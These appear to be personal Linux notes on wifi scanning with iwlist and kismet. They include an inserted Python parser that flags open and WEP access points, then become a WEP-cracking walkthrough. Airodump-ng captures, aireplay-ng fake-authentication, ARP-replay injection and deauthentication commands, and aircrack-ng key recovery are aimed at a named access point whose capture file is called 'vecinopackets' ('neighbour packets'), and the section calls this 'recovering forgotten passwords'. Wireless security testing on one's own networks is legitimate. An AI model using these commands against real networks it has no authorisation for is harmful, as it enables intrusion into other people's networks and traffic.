Need To See What’s In The Radio Spectrum
Try something like this.
sudo iwlist scan
sudo iwlist wlan0 scan | grep '\(ESSID\|Quality\|Address\)'
I think it’s part of the iw package in Ubuntu.
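The grep above only pulls three fields out of the scan. An added example (not from the original note) that parses the full `iwlist scan` output into records and flags the access points that are still open or WEP, which is the inventory check an owner wants before anything further down this page becomes relevant. The scan text embedded below is constructed sample data in iwlist's format, not a real capture; the WEP inference (encryption key on, no WPA information element) is iwlist's own convention.

```python
import re

# Constructed sample of `iwlist wlan0 scan` output (not captured from a real network).
SAMPLE_SCAN = """\
wlan0     Scan completed :
          Cell 01 - Address: 00:11:22:33:44:55
                    Channel:6
                    Quality=70/70  Signal level=-40 dBm
                    Encryption key:on
                    ESSID:"home-legacy"
                    IE: Unknown: 000B686F6D652D6C6567616379
          Cell 02 - Address: 66:77:88:99:AA:BB
                    Channel:11
                    Quality=45/70  Signal level=-65 dBm
                    Encryption key:on
                    ESSID:"home-main"
                    IE: IEEE 802.11i/WPA2 Version 1
                        Group Cipher : CCMP
                        Pairwise Ciphers (1) : CCMP
                        Authentication Suites (1) : PSK
          Cell 03 - Address: CC:DD:EE:FF:00:11
                    Channel:1
                    Quality=20/70  Signal level=-85 dBm
                    Encryption key:off
                    ESSID:"cafe-guest"
"""


def parse_iwlist(text):
    """Parse `iwlist scan` output into one dict per Cell block."""
    cells = []
    cur = None
    for line in text.splitlines():
        s = line.strip()
        m = re.match(r"Cell \d+ - Address: ([0-9A-Fa-f:]{17})", s)
        if m:
            # A new Cell header starts a new record.
            cur = {"address": m.group(1).upper(), "essid": "", "channel": None,
                   "quality": None, "key": False, "wpa": False}
            cells.append(cur)
            continue
        if cur is None:
            continue  # preamble before the first Cell
        if s.startswith("ESSID:"):
            cur["essid"] = s[len("ESSID:"):].strip('"')
        elif s.startswith("Channel:"):
            cur["channel"] = int(s.split(":", 1)[1])
        elif s.startswith("Quality="):
            q = re.match(r"Quality=(\d+)/(\d+)", s)
            cur["quality"] = int(q.group(1)) / int(q.group(2))
        elif s.startswith("Encryption key:"):
            cur["key"] = s.endswith("on")
        elif s.startswith("IE:") and "WPA" in s:
            # Either "IE: WPA Version 1" or "IE: IEEE 802.11i/WPA2 Version 1".
            cur["wpa"] = True

    for c in cells:
        if not c["key"]:
            c["encryption"] = "open"
        elif c["wpa"]:
            c["encryption"] = "WPA/WPA2"
        else:
            # Encryption on but no WPA IE advertised: iwlist's way of showing WEP.
            c["encryption"] = "WEP"
    return cells


def weak_networks(cells):
    """Access points that should be re-keyed or retired: open or WEP."""
    return [c for c in cells if c["encryption"] in ("open", "WEP")]


if __name__ == "__main__":
    # Stand-alone run: report on the constructed sample.
    for c in weak_networks(parse_iwlist(SAMPLE_SCAN)):
        print(f'{c["address"]}  ch{c["channel"]:>2}  {c["encryption"]:<8} {c["essid"]}')
```

To run it against a live scan, pipe `sudo iwlist wlan0 scan` into `parse_iwlist` instead of using `SAMPLE_SCAN`; the report lists only the cells an owner needs to act on.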
A great text-based interactive real time wifi scanner:
sudo apt-get install kismet
Tools to… uh… recover forgotten wifi passwords.
sudo apt-get install aircrack-ng
to find out what to put in your
Example 1 (eee): wlan0 Atheros ath5k - [phy0]
Then put this in the source= definition:
Example 2 (X60s):
Maybe you need to run kismet_server first? Not sure. It is client/server oriented.
Pick the candidate AP:
    SSID    : 2WIRE976
    Server  : localhost:2501
    BSSID   : 00:25:3C:E0:C6:A1
    Carrier : IEEE 802.11b
    Manuf   : Unknown
    Max Rate: 18.0
    BSS Time: 1213fd23181
    Max Seen: 2000 kbps
    First   : Fri Jun 11 21:40:25 2010
    Latest  : Fri Jun 11 21:40:38 2010
    Clients : 0
    Type    : Access Point (infrastructure)
    Info    :
    Channel : 8
    Privacy : Yes
    Encrypt : WEP
    Decryptd: No
    Beacon  : 25600 (26.214400 sec)
    Packets : 10
    Data    : 0
    LLC     : 10
    Crypt   : 0
    Weak    : 0
    Dupe IV : 0
    Data    : 0B
    Signal  :
    Power   : -92 (best -90)
    Noise   : -127 (best -127)
    IP Type : None detected
    Min Loc : N/A
    Max Loc : N/A
    Range   : N/A
Try capturing some packets:
$ sudo airodump-ng --bssid 00:25:3C:E0:C6:A1 --ivs -w vecinopackets --channel 8 wlan0
Try stimulating some packets to capture while capturing:
$ sudo aireplay-ng -1 0 -e 2WIRE976 -a 00:25:3C:E0:C6:A1 -h 00:DE:AD:BE:EF:01 wlan0
From the web site I’m referring to:
The one at the end lets Airodump know we only want to capture IVs. The filename can be anything you want, and will be saved in your home directory (or whatever directory you run the command from) as filename.ivs. Copy the bssid of the wireless network from the airodump window by selecting it and pressing Shift+Ctrl+C. Open up a new terminal window so we can run aireplay to start injecting packets so our data count goes up. We want the data column in airodump to reach between 100,000 and 400,000. The more packets we have, the faster aircrack can find the WEP key. If the WEP key is 128 bits, we may need up to 1,000,000 packets.
sudo aireplay -1 0 -e ESSID -a BSSID -h 0:1:2:3:4:5 ath0
This should associate the network with the wireless connection. If it times out repeatedly, you need to be closer to the wireless router or change your interface rate by typing
sudo iwconfig ath0 rate 1
Next we want to start injecting packets.
sudo aireplay -3 -b BSSID -h 0:1:2:3:4:5 ath0
At first, it will only read packets, and say 0 ARP requests and 0 packets sent. Just wait a minute or two and it will start sending packets in large quantities. If it returns text that says it has been deauthorized, press Ctrl+C and run the command again. You can try to speed things up by entering this command:
sudo aireplay -0 ath0 -a BSSID ath0
Otherwise just sit back and wait. As soon as packets begin to be sent, the data field in Airodump should start flying. Wait until the desired number of packets have been received, then open a new terminal window and run aircrack.
sudo aircrack filename.ivs
After a minute, aircrack should return the WEP key. If it doesn’t, collect more packets.